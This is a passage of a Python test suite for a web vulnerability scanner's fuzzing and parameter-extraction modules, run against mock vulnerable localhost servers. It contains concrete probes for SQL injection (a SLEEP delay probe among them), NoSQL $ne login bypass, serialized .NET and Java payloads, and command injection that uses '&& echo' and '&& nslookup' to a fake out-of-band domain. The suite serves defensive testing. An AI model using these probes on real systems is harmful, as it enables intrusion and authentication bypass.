+ """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.getparam_extract_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_getparam_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [novalue] (GET Form Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" + + +class TestExcavateParameterExtraction_jqueryjsonajax(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "hunt"] + jsonajax_extract_html = """ + + + + +

test

+ + + """ + return Response(xss_block, status=200) + return Response(self.parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + expect_args = re.compile("/otherpage.php") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + original_value_captured = False + xss_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [language]" in e.data["description"]: + web_parameter_emitted = True + if e.data["original_value"] == "en": + original_value_captured = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [language] Context: [In Javascript]" in e.data["description"]: + xss_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert original_value_captured, "original_value not captured" + assert xss_finding_emitted, "In Javascript XSS FINDING not emitted" + + +# XSS Parameter Needing URL-Encoding +class Test_Lightfuzz_urlencoding(Test_Lightfuzz_xss_injs): + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi", "crypto", "path", "serial", "sqli", "ssti", "xss"], + } + }, + } + + parameter_block = """ + + Link + + """ + + def check(self, module_test, events): + web_parameter_emitted = False + original_value_captured = False + xss_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [language]" in e.data["description"]: + web_parameter_emitted = True + if e.data["original_value"] is not None and e.data["original_value"] == "parameter with spaces": + original_value_captured = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [language] Context: [In Javascript]" in e.data["description"]: + xss_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert original_value_captured, "original_value not captured" + assert xss_finding_emitted, "In Javascript XSS FINDING not emitted" + + +class Test_Lightfuzz_nosqli_quoteescape(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["nosqli"], + } + }, + } + + def request_handler(self, request): + normal_block = """ +
+ + Pets +
+ """ + + qs = str(request.query_string.decode()) + if "category=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + if value == "Pets%27": + return Response("JSON ERROR!", status=500) + elif value == "Pets%5C%27": + return Response("No results", status=200) + elif value == "Pets%27%20%26%26%200%20%26%26%20%27x": + return Response("No results", status=200) + elif value == "Pets%27%20%26%26%201%20%26%26%20%27x": + return Response('{"category":"Pets","entries":["dog","cat","bird"]}', status=200) + else: + return Response("No results", status=200) + return Response(normal_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + nosqli_finding_emitted = False + finding_count = 0 + for e in events: + if e.type == "FINDING": + finding_count += 1 + if ( + "Possible NoSQL Injection. Parameter: [category] Parameter Type: [GETPARAM] Original Value: [Pets] Detection Method: [Quote/Escaped Quote + Conditional Affect]" + in e.data["description"] + ): + nosqli_finding_emitted = True + assert nosqli_finding_emitted, "NoSQLi FINDING not emitted" + assert finding_count == 1, "Unexpected FINDING events reported" + + +class Test_Lightfuzz_nosqli_negation(Test_Lightfuzz_nosqli_quoteescape): + def request_handler(self, request): + form_block = """ +
+ + +
+ + +
+ +
+ """ + if request.method == "GET": + return Response(form_block, status=200) + + if "username[$ne]" in request.form.keys() and "password[$ne]" in request.form.keys(): + return Response("Welcome, testuser1!", status=200) + if "username[$eq]" in request.form.keys() and "password[$eq]" in request.form.keys(): + return Response("Invalid Username or Password!", status=200) + else: + return Response("Invalid Username or Password!", status=200) + + def check(self, module_test, events): + nosqli_finding_emitted = False + finding_count = 0 + for e in events: + if e.type == "FINDING": + finding_count += 1 + if ( + "Possible NoSQL Injection. Parameter: [password] Parameter Type: [POSTPARAM] Detection Method: [Parameter Name Operator Injection - Negation ([$ne])] Differences: [body]" + in e.data["description"] + ): + nosqli_finding_emitted = True + assert nosqli_finding_emitted, "NoSQLi FINDING not emitted" + assert finding_count == 2, "Unexpected FINDING events reported" + + +class Test_Lightfuzz_nosqli_negation_falsepositive(Test_Lightfuzz_nosqli_quoteescape): + def request_handler(self, request): + form_block = """ +
+ + +
+ + +
+ +
+ """ + if request.method == "GET": + return Response(form_block, status=200) + + if "username[$ne]" in request.form.keys() and "password[$ne]" in request.form.keys(): + return Response("missing username or password", status=500) + if "username[$eq]" in request.form.keys() and "password[$eq]" in request.form.keys(): + return Response("missing username or password", status=500) + else: + return Response("Invalid Username or Password!", status=200) + + def check(self, module_test, events): + finding_count = 0 + for e in events: + if e.type == "FINDING": + finding_count += 1 + assert finding_count == 0, "False positive FINDING emitted" + + +# SQLI Single Quote/Two Single Quote (getparam) +class Test_Lightfuzz_sqli(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + parameter_block = """ + + """ + if "search=" in qs: + value = qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + sql_block_normal = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + + sql_block_error = """ +
+

Found error in SQL query

+
+
+ """ + if value.endswith("'"): + if value.endswith("''"): + return Response(sql_block_normal, status=200) + return Response(sql_block_error, status=500) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqli_finding_emitted, "SQLi Single/Double Quote getparam FINDING not emitted" + + +# SQLI Single Quote/Two Single Quote (postparam) +class Test_Lightfuzz_sqli_post(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + } + }, + } + + def request_handler(self, request): + parameter_block = """ + + """ + + if "search" in request.form.keys(): + value = request.form["search"] + + sql_block_normal = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + + sql_block_error = """ +
+

Found error in SQL query

+
+
+ """ + if value.endswith("'"): + if value.endswith("''"): + return Response(sql_block_normal, status=200) + return Response(sql_block_error, status=500) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [POSTPARAM] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqli_finding_emitted, "SQLi Single/Double Quote postparam FINDING not emitted" + + +# disable_post test +class Test_Lightfuzz_disable_post(Test_Lightfuzz_sqli_post): + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + "disable_post": True, + } + }, + } + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [POSTPARAM] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert not sqli_finding_emitted, "post-based SQLI emitted despite post-parameters being disabled" + + +# SQLI Single Quote/Two Single Quote (headers) +class Test_Lightfuzz_sqli_headers(Test_Lightfuzz_sqli): + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + seed_events = [] + parent_event = module_test.scan.make_event( + "http://127.0.0.1:8888/", + "URL", + module_test.scan.root_event, + module="httpx", + tags=["status-200", "distance-0"], + ) + + data = { + "host": "127.0.0.1", + "type": "HEADER", + "name": "test", + "original_value": None, + "url": "http://127.0.0.1:8888", + "description": "Test Dummy Header", + } + seed_event = module_test.scan.make_event(data, "WEB_PARAMETER", parent_event, tags=["distance-0"]) + seed_events.append(seed_event) + module_test.scan.target.seeds.events = set(seed_events) + + def request_handler(self, request): + placeholder_block = """ + +

placeholder

+ + """ + + if request.headers.get("Test") is not None: + header_value = request.headers.get("Test") + + header_block_normal = f""" + +

placeholder

+

test: {header_value}

+ + """ + header_block_error = """ + +

placeholder

+

Error!

+ + """ + if header_value.endswith("'") and not header_value.endswith("''"): + return Response(header_block_error, status=500) + return Response(header_block_normal, status=200) + return Response(placeholder_block, status=200) + + def check(self, module_test, events): + sqli_finding_emitted = False + for e in events: + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [test] Parameter Type: [HEADER] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]" + in e.data["description"] + ): + sqli_finding_emitted = True + assert sqli_finding_emitted, "SQLi Single/Double Quote headers FINDING not emitted" + + +# SQLI Single Quote/Two Single Quote (cookies) +class Test_Lightfuzz_sqli_cookies(Test_Lightfuzz_sqli): + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + seed_events = [] + parent_event = module_test.scan.make_event( + "http://127.0.0.1:8888/", + "URL", + module_test.scan.root_event, + module="httpx", + tags=["status-200", "distance-0"], + ) + + data = { + "host": "127.0.0.1", + "type": "COOKIE", + "name": "test", + "original_value": None, + "url": "http://127.0.0.1:8888", + "description": "Test Dummy Header", + } + seed_event = module_test.scan.make_event(data, "WEB_PARAMETER", parent_event, tags=["distance-0"]) + seed_events.append(seed_event) + module_test.scan.target.seeds.events = set(seed_events) + + def request_handler(self, request): + placeholder_block = """ + +

placeholder

+ + """ + + if request.cookies.get("test") is not None: + header_value = request.cookies.get("test") + + header_block_normal = f""" + +

placeholder

+

test: {header_value}

+ + """ + + header_block_error = """ + +

placeholder

+

Error!

+ + """ + if header_value.endswith("'") and not header_value.endswith("''"): + return Response(header_block_error, status=500) + return Response(header_block_normal, status=200) + return Response(placeholder_block, status=200) + + def check(self, module_test, events): + sqli_finding_emitted = False + for e in events: + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [test] Parameter Type: [COOKIE] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]" + in e.data["description"] + ): + sqli_finding_emitted = True + assert sqli_finding_emitted, "SQLi Single/Double Quote cookies FINDING not emitted" + + +# SQLi Delay Probe +class Test_Lightfuzz_sqli_delay(Test_Lightfuzz_sqli): + def request_handler(self, request): + from time import sleep + + qs = str(request.query_string.decode()) + + parameter_block = """ + + + """ + if "search=" in qs: + value = qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + sql_block = """ +
+

0 search results found

+
+
+ """ + if "' AND (SLEEP(5)) AND '" in unquote(value): + sleep(5) + return Response(sql_block, status=200) + return Response(parameter_block, status=200) + + def check(self, module_test, events): + web_parameter_emitted = False + sqldelay_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible Blind SQL Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [Delay Probe (1' AND (SLEEP(5)) AND ')]" + in e.data["description"] + ): + sqldelay_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqldelay_finding_emitted, "SQLi Delay FINDING not emitted" + + +# Serialization Module (Error Resolution) +class Test_Lightfuzz_serial_errorresolution(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["serial"], + } + }, + } + + dotnet_serial_error = """ + + Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. + +

+ + Exception Details: System.Runtime.Serialization.SerializationException: End of Stream encountered before parsing was completed.

+ + """ + + dotnet_serial_html = """ + + + + Deserialization RCE Example + + +
+
+ +
+ +
+ + + +
+
+

Deserialization Test

+ Enter serialized data:
+

+

+
+
+ + + + + """ + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def request_handler(self, request): + dotnet_serial_error_resolved = ( + "Deserialization successful! Object type: System.String" + ) + post_params = request.form + + if "TextBox1" not in post_params.keys(): + return Response(self.dotnet_serial_html, status=200) + + else: + if post_params["__VIEWSTATE"] != "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP": + return Response(self.dotnet_serial_error, status=500) + if post_params["TextBox1"] == "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==": + return Response(dotnet_serial_error_resolved, status=200) + else: + return Response(self.dotnet_serial_error, status=500) + + def check(self, module_test, events): + excavate_extracted_form_parameter = False + excavate_extracted_form_parameter_details = False + lightfuzz_serial_detect_errorresolution = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["name"] == "TextBox1": + excavate_extracted_form_parameter = True + if ( + e.data["url"] == "http://127.0.0.1:8888/deser.aspx" + and e.data["host"] == "127.0.0.1" + and e.data["additional_params"] + == { + "__VIEWSTATE": "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP", + "__VIEWSTATEGENERATOR": "AD6F025C", + "__EVENTVALIDATION": "/wEdAANdCjkiIFhjCB8ta8aO/EhuESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3czZjft8VgObR/WUivai7w4kfR1wg==", + "Button1": "Submit", + } + ): + excavate_extracted_form_parameter_details = True + if e.type == "FINDING": + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. Parameter: [TextBox1] Parameter Type: [POSTPARAM] Technique: [Error Resolution] Serialization Payload: [dotnet_base64]" + ): + lightfuzz_serial_detect_errorresolution = True + + assert excavate_extracted_form_parameter, "WEB_PARAMETER for POST form was not emitted" + assert excavate_extracted_form_parameter_details, "WEB_PARAMETER for POST form did not have correct data" + assert lightfuzz_serial_detect_errorresolution, ( + "Lightfuzz Serial module failed to detect ASP.NET error resolution based deserialization" + ) + + +# Serialization Module (Error Resolution False Positive) +class Test_Lightfuzz_serial_errorresolution_falsepositive(Test_Lightfuzz_serial_errorresolution): + def request_handler(self, request): + dotnet_serial_error_resolved_with_general_error = ( + "Internal Server Error (invalid characters!)" + ) + post_params = request.form + + if "TextBox1" not in post_params.keys(): + return Response(self.dotnet_serial_html, status=200) + + else: + if post_params["__VIEWSTATE"] != "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP": + return Response(self.dotnet_serial_error, status=500) + if post_params["TextBox1"] == "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==": + return Response(dotnet_serial_error_resolved_with_general_error, status=200) + else: + return Response(self.dotnet_serial_error, status=500) + + def check(self, module_test, events): + no_finding_emitted = True + + for e in events: + if e.type == "FINDING": + no_finding_emitted = False + + assert no_finding_emitted, "False positive finding was emitted" + + +class Test_Lightfuzz_serial_errorresolution_existingvalue_valid(Test_Lightfuzz_serial_errorresolution): + dotnet_serial_html = """ + + + + Deserialization RCE Example + + +
+
+ +
+ +
+ + + +
+
+

Deserialization Test

+ Enter serialized data:
+

+

+
+
+ + + + + """ + + def check(self, module_test, events): + excavate_extracted_form_parameter = False + excavate_extracted_form_parameter_details = False + excavate_detect_serialization_value = False + lightfuzz_serial_detect_errorresolution = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["name"] == "TextBox1": + excavate_extracted_form_parameter = True + if ( + e.data["url"] == "http://127.0.0.1:8888/deser.aspx" + and e.data["host"] == "127.0.0.1" + and e.data["original_value"] == "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==" + and e.data["additional_params"] + == { + "__VIEWSTATE": "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP", + "__VIEWSTATEGENERATOR": "AD6F025C", + "__EVENTVALIDATION": "/wEdAANdCjkiIFhjCB8ta8aO/EhuESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3czZjft8VgObR/WUivai7w4kfR1wg==", + "Button1": "Submit", + } + ): + excavate_extracted_form_parameter_details = True + if e.type == "FINDING": + if e.data["description"] == "HTTP response (body) contains a possible serialized object (DOTNET)": + excavate_detect_serialization_value = True + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. Parameter: [TextBox1] Parameter Type: [POSTPARAM] Original Value: [AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==] Technique: [Error Resolution] Serialization Payload: [dotnet_base64]" + ): + lightfuzz_serial_detect_errorresolution = True + + assert excavate_extracted_form_parameter, "WEB_PARAMETER for POST form was not emitted" + assert excavate_extracted_form_parameter_details, "WEB_PARAMETER for POST form did not have correct data" + assert excavate_detect_serialization_value, "WEB_PARAMETER for POST form did not have correct data" + assert lightfuzz_serial_detect_errorresolution, ( + "Lightfuzz Serial module failed to detect ASP.NET error resolution based deserialization" + ) + + +class Test_Lightfuzz_serial_errorresolution_existingvalue_invalid(Test_Lightfuzz_serial_errorresolution_falsepositive): + dotnet_serial_html = """ + + + + Deserialization RCE Example + + +
+
+ +
+ +
+ + + +
+
+

Deserialization Test

+ Enter serialized data:
+

+

+
+
+ + + + + """ + + +# Serialization Module (Error Differential) +class Test_Lightfuzz_serial_errordifferential(Test_Lightfuzz_serial_errorresolution): + def request_handler(self, request): + java_serial_error = """ + +

Internal Server Error

+

java.io.StreamCorruptedException: invalid stream header: 0C400304

+ + """ + + java_serial_error_keyword = """ + +

Internal Server Error

+

java.lang.ClassCastException: Cannot cast java.lang.String to lab.actions.common.serializable.AccessTokenUser

+ + """ + + java_serial_html = """ + + + + Deserialization RCE Example + + + Please log in to continue. + + + """ + + cookies = request.cookies + + if "session" not in cookies.keys(): + response = Response(java_serial_html, status=200) + response.set_cookie("session", value="", max_age=3600, httponly=True) + return response + + else: + if unquote(cookies["session"]) == "rO0ABXQABHRlc3Q=": + return Response(java_serial_error_keyword, status=500) + else: + return Response(java_serial_error, status=500) + + def check(self, module_test, events): + excavate_extracted_cookie_parameter = False + lightfuzz_serial_detect_errordifferential = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["description"] == "Set-Cookie Assigned Cookie [session]" and e.data["type"] == "COOKIE": + excavate_extracted_cookie_parameter = True + + if e.type == "FINDING": + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. Parameter: [session] Parameter Type: [COOKIE] Technique: [Differential Error Analysis] Error-String: [cannot cast java.lang.string] Payload: [java_base64_string_error]" + ): + lightfuzz_serial_detect_errordifferential = True + + assert excavate_extracted_cookie_parameter, "WEB_PARAMETER for cookie was not emitted" + assert lightfuzz_serial_detect_errordifferential, ( + "Lightfuzz Serial module failed to detect Java error differential based deserialization" + ) + + +# Serialization Modules (Error Differential - False positive check) +class Test_Lightfuzz_serial_errordifferential_falsepositive(Test_Lightfuzz_serial_errorresolution): + def request_handler(self, request): + post_params = request.form + if "TextBox1" not in post_params.keys(): + return Response(self.dotnet_serial_html, status=200) + + else: + dotnet_serial_reflection = ( + f"

invalid user

reflected input: {post_params['TextBox1']}" + ) + return Response(dotnet_serial_reflection, status=500) + + def check(self, module_test, events): + finding_count = 0 + for e in events: + if e.type == "FINDING": + finding_count += 1 + assert finding_count == 0, "Unexpected FINDING events reported" + + +# CMDi echo canary +class Test_Lightfuzz_cmdi(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ +

+ """ + if "search=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + if "&& echo " in unquote(value): + cmdi_value = unquote(value).split("&& echo ")[1].split(" ")[0] + else: + cmdi_value = value + cmdi_block = f""" +
+

0 search results for '{unquote(cmdi_value)}'

+
+
+ """ + return Response(cmdi_block, status=200) + + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + cmdi_echocanary_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "POSSIBLE OS Command Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [echo canary] CMD Probe Delimeters: [&&]" + in e.data["description"] + ): + cmdi_echocanary_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert cmdi_echocanary_finding_emitted, "echo canary CMDi FINDING not emitted" + + +# CMDi interactsh +class Test_Lightfuzz_cmdi_interactsh(Test_Lightfuzz_cmdi): + @staticmethod + def extract_subdomain_tag(data): + pattern = r"search=.+%26%26%20nslookup%20(.+)\.fakedomain\.fakeinteractsh.com%20%26%26" + match = re.search(pattern, data) + if match: + return match.group(1) + + config_overrides = { + "interactsh_disable": False, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ + + """ + + if "search=" in qs: + subdomain_tag = None + subdomain_tag = self.extract_subdomain_tag(request.full_path) + + if subdomain_tag: + self.interactsh_mock_instance.mock_interaction(subdomain_tag) + return Response(parameter_block, status=200) + + async def setup_before_prep(self, module_test): + self.interactsh_mock_instance = module_test.mock_interactsh("lightfuzz") + + module_test.monkeypatch.setattr( + module_test.scan.helpers, "interactsh", lambda *args, **kwargs: self.interactsh_mock_instance + ) + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + cmdi_interacttsh_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "VULNERABILITY": + if ( + "OS Command Injection (OOB Interaction) Type: [GETPARAM] Parameter Name: [search] Probe: [&&]" + in e.data["description"] + ): + cmdi_interacttsh_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert cmdi_interacttsh_finding_emitted, "interactsh CMDi FINDING not emitted" + + +class Test_Lightfuzz_speculative(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "paramminer_getparams", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["xss"]}, + "paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}, + "excavate": {"speculate_params": True}, + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + parameter_block = """ + { + "search": 1, + "common": 1 + } + """ + if "search=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + xss_block = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + return Response(xss_block, status=200) + return Response(parameter_block, status=200, headers={"Content-Type": "application/json"}) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + excavate_json_extraction = False + xss_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter (speculative from json content) [search]" in e.data["description"]: + excavate_json_extraction = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [search] Context: [Between Tags" in e.data["description"]: + xss_finding_emitted = True + + assert excavate_json_extraction, "Excavate failed to extract json parameter" + assert xss_finding_emitted, "Between Tags XSS FINDING not emitted" + + +class Test_Lightfuzz_crypto_error(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["crypto"]}, + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ +
+
+ + +
+
+ """ + crypto_block = """ +
+

Access Denied!

+
+
+ """ + if "secret=" in qs: + value = qs.split("=")[1] + if value: + return Response(crypto_block, status=200) + + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + cryptoerror_parameter_extracted = False + cryptoerror_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [secret] (GET Form Submodule)" in e.data["description"]: + cryptoerror_parameter_extracted = True + if e.type == "FINDING": + if ( + "Possible Cryptographic Error. Parameter: [secret] Parameter Type: [GETPARAM] Original Value: [08a5a2cea9c5a5576e6e5314edcba581d21c7111c9c0c06990327b9127058d67]" + in e.data["description"] + ): + cryptoerror_finding_emitted = True + assert cryptoerror_parameter_extracted, "Parameter not extracted" + assert cryptoerror_finding_emitted, "Crypto Error Message FINDING not emitted" + + +class Test_Lightfuzz_crypto_error_falsepositive(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["crypto"]}, + }, + } + + def request_handler(self, request): + fp_block = """ +
+
+ + +
+

Access Denied!

+
+ """ + return Response(fp_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + cryptoerror_parameter_extracted = False + cryptoerror_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [secret] (GET Form Submodule)" in e.data["description"]: + cryptoerror_parameter_extracted = True + if e.type == "FINDING": + if "Possible Cryptographic Error" in e.data["description"]: + cryptoerror_finding_emitted = True + assert cryptoerror_parameter_extracted, "Parameter not extracted" + assert not cryptoerror_finding_emitted, ( + "Crypto Error Message FINDING was emitted (it is an intentional false positive)" + ) + + +class Test_Lightfuzz_PaddingOracleDetection(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["crypto"], + } + }, + } + + def request_handler(self, request): + encrypted_value = quote( + "dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q+4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg==" + ) + default_html_response = f""" + + +
+ + +
